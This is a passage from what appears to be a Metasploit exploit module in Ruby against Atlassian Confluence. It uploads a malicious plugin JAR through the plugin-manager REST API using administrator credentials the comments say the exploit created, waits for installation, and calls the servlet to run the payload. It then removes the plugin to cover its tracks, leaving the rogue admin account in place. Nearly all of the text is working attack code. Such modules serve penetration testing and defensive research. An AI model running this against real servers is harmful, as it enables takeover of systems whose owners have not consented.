<version>#{rand(1024)}.#{rand(1024)}</version>  </plugin-info>  <servlet key="#{rand_text_alpha(8)}" class="#{jar.substitutions['metasploit']}.PayloadServlet">    <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>  </servlet></atlassian-plugin>)      )      jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class'))      message = Rex::MIME::Message.new      message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name=\"plugin\"; filename=\"#{rand_text_alphanumeric(8)}.jar\"")      # 6. Upload the malicious plugin.      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',        'ctype' => 'multipart/form-data; boundary=' + message.bound,        'headers' => {          'Authorization' => basic_auth(admin_username, admin_password),          'Accept' => '*/*'        },        'vars_get' => {          'token' => upm_token        },        'data' => message.to_s      )      unless res&.code == 202        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply code from endpoint: /rest/plugins/1.0/')      end      unless res.body =~ %r{<textarea>(.+)</textarea>}        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/')      end      begin        plugin_json = JSON.parse(::Regexp.last_match(1))      rescue JSON::ParserError        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, failed to parse JSON data from endpoint: /rest/plugins/1.0/')      end      # We receive a JSON object like this:      # <textarea>{"type":"INSTALL","pingAfter":100,"status":{"done":false,"statusCode":200,"contentType":"application/vnd.atl.plugins.install.installing+json","source":"JQEjEJBr.jar","name":"JQEjEJBr.jar"},"links":{"self":"/rest/plugins/1.0/pending/52227753-1c3e-496f-a4f4-d52a8b3850dc","alternate":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc"},"timestamp":1697471602188,"userKey":"4028d6b28b294680018b39311d17001e","id":"52227753-1c3e-496f-a4f4-d52a8b3850dc"}</textarea>      links_alternate = plugin_json&.dig('links', 'alternate')      if links_alternate.nil?        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, no alternate link in reply from endpoint: /rest/plugins/1.0/')      end      print_status('Waiting for plugin to be installed...')      # 7. The plugin is installed asynchronously, so we poll the server for installation to be completed.      plugin_ready = retry_until_truthy(timeout: datastore['CONFLUENCE_PLUGIN_TIMEOUT']) do        res = send_request_cgi(          'method' => 'GET',          'uri' => normalize_uri(target_uri.path, links_alternate)        )        # We receive a JSON result to indicate if the plugin is finished installing.        # {"links":{"self":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc","result":"/rest/plugins/1.0/plkWITNH-key"},"done":true,"type":"INSTALL","progress":1.0,"pollDelay":100,"timestamp":1697471602188}        if res&.code == 200          begin            res_json = JSON.parse(res.body)            next res_json['done']          rescue JSON::ParserError            next false          end        end        false      end      unless plugin_ready        fail_with(Failure::TimeoutExpired, 'Uploading plugin failed, timeout while waiting to install.')      end      print_status('Triggering payload...')      # 8. Trigger the payload by performing a request to the malicious servlet endpoint.      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'plugins', 'servlet', payload_endpoint)      )      unless res&.code == 200        fail_with(Failure::PayloadFailed, "Triggering payload failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")      end    ensure      print_status('Deleting plugin...')      # 9. Delete the plugin we uploaded as we no longer need it. We cannot delete the admin user we created as      # Confluence doesnt allow a user to delete themself.      res = send_request_cgi(        'method' => 'DELETE',        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0', "#{plugin_key}-key"),        'headers' => {          'Authorization' => basic_auth(admin_username, admin_password),          'Connection' => 'close'        }      )      unless res&.code == 204        print_warning("Deleting plugin failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")      end    end  endend

Tag

#windows